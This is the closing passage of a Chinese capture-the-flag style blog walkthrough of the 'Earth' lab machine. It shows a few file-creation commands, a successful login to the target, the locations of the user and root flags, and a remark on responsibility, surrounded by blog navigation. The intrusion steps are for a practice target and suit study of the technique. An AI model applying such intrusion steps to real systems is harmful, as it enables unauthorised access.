<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">touch</span>  /dev/shm/kHgTFI5G</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">touch</span> /dev/shm/Zw7bV9U5</pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token function">touch</span> /tmp/kcM0Wewe</pre></td></tr></tbody></table></figure><p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240505185404951.webp" alt="image-20240505185404951"></p>
<p>在靶机上登录成功！！！</p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240505185531193.webp" alt="image-20240505185531193"></p>
<p>原来 flag 前后都字符啊……（长叹一口气）。最后也是找到了两个🚩🚩flag</p>
<p><code>/root/root_flag.txt</code>  &amp;  <code>/var/earth_web/user_flag.txt</code></p>
<p><img loading="lazy" data-src="/images/Earth%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95.assets/image-20240505190233308.webp" alt="image-20240505190233308"></p>
<h1 id="finally"><a class="anchor" href="#finally">#</a> Finally</h1>
<p>每个网安人的必修课大概就是：</p>
<p><strong>With Great Rower Comes Great Responsibilities</strong></p>
<p><img loading="lazy" data-src="https://s2.loli.net/2024/05/05/A8yelkGqMTRvP6a.jpg" alt="With Great Rower Comes Great Responsibilities"></p>
<div class="tags"><a href="/tags/Penetration-Test/" rel="tag"><i class="ic i-tag"></i>Penetration Test</a></div></div><footer><div class="meta"><span class="icon"><i class="ic i-eye"></i></span><span>此文章已被阅读次数:</span><span class="waline-pageview-count" id="twikoo_visitors" data-path="post/Get-Earth-Shell/">正在加载...</span><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于</span><time title="修改时间：2024-05-05 22:39:49" itemprop="dateModified" datetime="2024-05-05T22:39:49+08:00">2024-05-05</time></span></div><div class="reward"><button><i class="ic i-heartbeat"></i>赞赏</button><p>请我喝[茶]~(￣▽￣)~*</p><div id="qr"><div><img loading="lazy" data-src="/assets/wechatpay.webp" alt="MorIo24 微信支付"><p>微信支付</p></div><div><img loading="lazy" data-src="/assets/alipay.webp" alt="MorIo24 支付宝"><p>支付宝</p></div></div></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>MorIo24<i class="ic i-at"><em>@</em></i>Glad to see U (◦˙▽˙◦)</li><li class="link"><strong>本文链接：</strong><a href="https://ctf-learner.github.io/post/Get-Earth-Shell/" title="Get Earth Shell">https://ctf-learner.github.io/post/Get-Earth-Shell/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener external nofollow noreferrer" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/post/MSF-%E4%B8%87%E5%8D%83waf%E4%B8%AD%E5%8F%96ROOT%E9%A6%96%E7%BA%A7/" rel="prev" itemprop="url" data-background-image="https://s2.loli.net/2024/04/15/BXrQFv9hOn2iZm6.webp" title="MSF---万千waf中取ROOT首级"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>Penetration Test</span><h3>MSF---万千waf中取ROOT首级</h3></a></div><div class="item right"></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text"> 主机发现</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%BB%95%E4%BA%86%E4%B8%80%E5%A0%86%E5%BC%AF%E5%AD%90"><span class="toc-number">2.</span> <span class="toc-text"> 绕了一堆弯子</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#dns%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90%E9%97%AE%E9%A2%98"><span class="toc-number">3.</span> <span class="toc-text"> DNS 域名解析问题</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E8%AF%81%E4%B9%A6%E9%AA%8C%E8%AF%81"><span class="toc-number">4.</span> <span class="toc-text"> 反向代理？！证书验证？！</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xor%E5%88%9D%E6%8E%A2"><span class="toc-number">5.</span> <span class="toc-text"> XOR 初探</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%99%BD%E9%80%81%E4%BA%86%E4%B8%80%E4%B8%AAwebshell"><span class="toc-number">6.</span> <span class="toc-text"> 白送了一个 webshell</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#get-earth-shell"><span class="toc-number">7.</span> <span class="toc-text"> Get-Earth-Shell</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#finally"><span class="toc-number">8.</span> <span class="toc-text"> Finally</span></a></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li><a href="/post/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/" rel="bookmark" title="扫描不止 nc&amp;nmap">扫描不止 nc&amp;nmap</a></li><li><a href="/post/%E4%B8%8D%E4%BC%9A%E5%B0%B1%E6%90%9Csearchsploit/" rel="bookmark" title="不会就搜searchsploit">不会就搜searchsploit</a></li><li><a href="/post/MSF-%E4%B8%87%E5%8D%83waf%E4%B8%AD%E5%8F%96ROOT%E9%A6%96%E7%BA%A7/" rel="bookmark" title="MSF---万千waf中取ROOT首级">MSF---万千waf中取ROOT首级</a></li><li class="active"><a href="/post/Get-Earth-Shell/" rel="bookmark" title="Get Earth Shell">Get Earth Shell</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="MorIo24" src="/assets/avatar.webp"><p class="name" itemprop="name">MorIo24</p><div class="description" itemprop="description">Never hack for profit</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">7</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">3</span><span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">5</span><span class="name">标签</span></a></div></nav><div class="social"><a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/ctf-learner" class="item github" title="https://github.com/ctf-learner"><i class="ic i-github"></i></a><a target="_blank" rel="noopener external nofollow noreferrer" href="https://gitee.com/morio24" class="item gitee" title="https://gitee.com/morio24"><i class="ic i-gitee"></i></a><a href="gmail:morio24@qq.com" rel="external nofollow noreferrer" class="item email" title="gmail:morio24@qq.com"><i class="ic i-envelope"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/about/me" rel="section"><i class="ic i-user"></i>关于</a></li><li class="item dropdown"><a href="#" onclick="return false;"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li></ul></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-coffee"></i>友链</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/post/MSF-%E4%B8%87%E5%8D%83waf%E4%B8%AD%E5%8F%96ROOT%E9%A6%96%E7%BA%A7/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/AWD/" title="分类于AWD">AWD</a></div><span><a href="/post/AWD-waf%E8%84%9A%E6%9C%AC/">AWD-waf脚本</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Penetration-Test/" title="分类于Penetration Test">Penetration Test</a></div><span><a href="/post/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/">扫描不止 nc&amp;nmap</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E5%85%B3%E4%BA%8EshokaX/" title="分类于关于shokaX">关于shokaX</a></div><span><a href="/post/%E6%90%AD%E5%8D%9A%E5%AE%A2%E4%B8%80%E8%B7%AF%E7%9A%84%E5%BF%83%E9%85%B8/">搭博客一路的心酸</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Penetration-Test/" title="分类于Penetration Test">Penetration Test</a></div><span><a href="/post/Get-Earth-Shell/">Get Earth Shell</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Penetration-Test/" title="分类于Penetration Test">Penetration Test</a></div><span><a href="/post/MSF-%E4%B8%87%E5%8D%83waf%E4%B8%AD%E5%8F%96ROOT%E9%A6%96%E7%BA%A7/">MSF---万千waf中取ROOT首级</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Penetration-Test/" title="分类于Penetration Test">Penetration Test</a></div><span><a href="/post/%E4%B8%8D%E4%BC%9A%E5%B0%B1%E6%90%9Csearchsploit/">不会就搜searchsploit</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/AWD/" title="分类于AWD">AWD</a></div><span><a href="/post/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/">AWD初体验</a></span></li></ul></div></div><div class="status"><div class="copyright">© 追风赶月莫停留，平芜尽处是春山 -<span itemprop="copyrightYear">2024</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">MorIo24 @ MorIo24's blog</span></div><div class="count"><div class="time-last"><span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span><script>var now = new Date();
function createtime() {
    var grt= new Date("4/16/2024 13:14:20");
    now.setTime(now.getTime()+250);
    days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
    hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
    if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
    mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
    seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
    snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
    document.getElementById("timeDate").innerHTML = "小破站在风雨中孤苦伶仃度过了 "+dnum+" 天 ";
    document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
}
setInterval("createtime()",250);</script></div><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">69k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">1:03</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener external nofollow noreferrer" href="https://hexo.io/">Hexo</a> &amp; Theme.<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div><script src="/live2d-widget/autoload.js"></script></div></div></footer></div><script data-config="" type="text/javascript">var LOCAL = {
    ispost: true,
        path: `post/Get-Earth-Shell/`,
        favicon: {
        show: `好久不见~(ღ˘⌣˘ღ)~`,
        hide: `404咯(｡í _ ì｡)`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/pace/1.2.4/pace.min.js" async=""></script><script src="/js/siteInit.js?v=0.4.2" type="module" fetchpriority="high" defer=""></script></body></html>